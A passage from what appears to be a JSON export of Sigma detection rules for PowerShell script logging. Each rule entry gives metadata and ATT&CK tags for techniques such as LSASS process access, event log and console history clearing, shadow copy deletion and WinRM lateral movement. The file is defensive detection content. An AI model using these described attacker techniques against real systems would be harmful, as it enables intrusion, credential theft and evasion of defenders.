"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "851fd622-b675-4d26-b803-14bc7baa517a", "value": "HackTool - WinPwn Execution - ScriptBlock" }, { "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly." ], "filename": "posh_ps_add_windows_capability.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content", "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml" ], "tags": [ "attack.execution" ] }, "uuid": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "value": "Add Windows Capability Via PowerShell Script" }, { "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-25", "falsepositive": [ "Unknown" ], "filename": "posh_ps_clearing_windows_console_history.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.shellhacks.com/clear-history-powershell/", "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", "value": "Clearing Windows Console History" }, { "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "meta": { "author": "frack113", "creation_date": "2022-02-01", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_mount_diskimage.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", "https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.005" ] }, "related": [ { "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", "value": "Suspicious Mount-DiskImage" }, { "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-17", "falsepositive": [ "Legitimate admin scripts may use the same technique; it is better to exclude specific computers or users who execute these commands or scripts often" ], "filename": "posh_ps_computer_discovery_get_adcomputer.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db885529-903f-4c5d-9864-28fe199e6370", "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell" }, { "description": "Detects when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", "meta": { "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "creation_date": "2020-10-08", "falsepositive": [ "Administrators or Power users may remove their shares via cmd line" ], "filename": "posh_ps_susp_mounted_share_deletion.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.005" ] }, "related": [ { "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", "value": "PowerShell Deleted Mounted Share" }, { "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. 
As seen used in the DAMP project.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-05", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_ace_tampering.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/HarmJ0y/DAMP", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "2f77047c-e6e9-4c11-b088-a3de399524cd", "value": "Potential Persistence Via Security Descriptors - ScriptBlock" }, { "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", "meta": { "author": "frack113", "creation_date": "2021-12-15", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_smb_share_reco.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", "value": "Suspicious Get Information for SMB Share" }, { "description": "Once established within a system or network, an adversary may use automated techniques for 
collecting internal data.", "meta": { "author": "frack113", "creation_date": "2021-07-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_automated_collection.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" ], "tags": [ "attack.collection", "attack.t1119" ] }, "related": [ { "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", "value": "Automated Collection Command PowerShell" }, { "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", "meta": { "author": "Tim Rauch", "creation_date": "2022-09-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", "value": "Deletion of 
Volume Shadow Copies via WMI with PowerShell - PS Script" }, { "description": "Detects PowerShell scripts that add a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis bypasses the default DNS server and uses a specified server to answer the query.\n", "meta": { "author": "Borna Talebi", "creation_date": "2021-09-14", "falsepositive": [ "Unknown" ], "filename": "posh_ps_add_dnsclient_rule.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", "https://twitter.com/NathanMcNulty/status/1569497348841287681", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" ], "tags": [ "attack.impact", "attack.t1565" ] }, "related": [ { "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", "value": "Powershell Add Name Resolution Policy Table Rule" }, { "description": "Detects parameters used by WMImplant", "meta": { "author": "NVISO", "creation_date": "2020-03-26", "falsepositive": [ "Administrative scripts that use the same keywords." 
], "filename": "posh_ps_wmimplant.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/FortyNorthSecurity/WMImplant", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "value": "WMImplant Hack Tool" }, { "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_get_acl_service.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" ], "tags": [ "attack.persistence", "attack.t1574.011", "stp.2a" ] }, "related": [ { "dest-uuid": 
"17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3", "value": "Service Registry Permissions Weakness Check" }, { "description": "Detects usage of the \"Add-AppxPackage\" cmdlet or its alias \"Add-AppPackage\" to install unsigned AppX packages", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-31", "falsepositive": [ "Installation of unsigned packages for testing purposes" ], "filename": "posh_ps_install_unsigned_appx_packages.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package", "https://twitter.com/WindowsDocs/status/1620078135080325122", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion" ] }, "uuid": "975b2262-9a49-439d-92a6-0709cccdf0b2", "value": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript" }, { "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or actions similar to the \"msdt\" lolbin (as described in LOLBAS)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-21", "falsepositive": [ "Legitimate usage of the \"TroubleshootingPack\" cmdlets for troubleshooting purposes" ], "filename": "posh_ps_susp_follina_execution.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1537919885031772161", "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { 
"dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", "value": "Troubleshooting Pack Cmdlet Execution" }, { "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", "meta": { "author": "frack113", "creation_date": "2022-04-09", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_hyper_v_condlet.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", "https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.006" ] }, "related": [ { "dest-uuid": "b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", "value": "Suspicious Hyper-V Cmdlets" }, { "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_rundll.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { 
"dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell" }, { "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Legitimate script" ], "filename": "posh_ps_enable_psremoting.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", "value": "Enable Windows Remote Management" }, { "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-04-23", "falsepositive": [ "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "filename": 
"posh_ps_susp_getprocess_lsass.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "value": "PowerShell Get-Process LSASS in ScriptBlock" }, { "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_cmdlet_scheduled_task.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" ], "tags": [ "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "value": "Powershell Create Scheduled Task" }, { "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the 
Windows event logs", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-12", "falsepositive": [ "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" ], "filename": "posh_ps_susp_clear_eventlog.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://twitter.com/oroneequalsone/status/1568432028361830402", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.001" ] }, "related": [ { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", "value": "Suspicious Eventlog Clear" }, { "description": "Detects suspicious Powershell code that execute COM Objects", "meta": { "author": "frack113", "creation_date": "2022-04-02", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_gettypefromclsid.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", "value": "Suspicious GetTypeFromCLSID ShellExecute" }, { "description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Unknown" ], "filename": "posh_ps_script_with_upload_capabilities.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml" ], "tags": [ "attack.exfiltration", "attack.t1020" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "value": "PowerShell Script With File Upload Capabilities" }, { "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "meta": { "author": "frack113", "creation_date": "2022-09-10", "falsepositive": [ "Legitimate usage of the features listed in the rule." 
], "filename": "posh_ps_enable_susp_windows_optional_feature.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "55c925c1-7195-426b-a136-a9396800e29b", "value": "Potential Suspicious Windows Feature Enabled" }, { "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", "meta": { "author": "frack113", "creation_date": "2022-04-24", "falsepositive": [ "Unknown" ], "filename": "posh_ps_win32_product_install_msi.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", "value": "PowerShell WMI Win32_Product Install MSI" }, { "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Legitimate script" ], "filename": "posh_ps_invoke_command_remote.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "value": "Execute Invoke-command on Remote Host" }, { "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", "meta": { "author": "frack113", "creation_date": "2022-06-04", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_get_gpo.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" ], "tags": [ "attack.discovery", "attack.t1615" ] }, "related": [ { "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", "value": 
"Suspicious GPO Discovery With Get-GPO" }, { "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a user's local system, such as Outlook storage or cache files.\n", "meta": { "author": "frack113", "creation_date": "2021-07-21", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_mail_acces.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" ], "tags": [ "attack.collection", "attack.t1114.001" ] }, "related": [ { "dest-uuid": "1e9eb839-294b-48cc-b0d3-c45555a2a004", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", "value": "Powershell Local Email Collection" }, { "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "meta": { "author": "frack113", "creation_date": "2021-07-30", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_recon_export.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" ], "tags": [ "attack.collection", "attack.t1119" ] }, "related": [ { "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", "value": "Recon Information for Export with 
PowerShell" }, { "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "meta": { "author": "frack113", "creation_date": "2022-09-10", "falsepositive": [ "Unknown" ], "filename": "posh_ps_disable_windows_optional_feature.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ 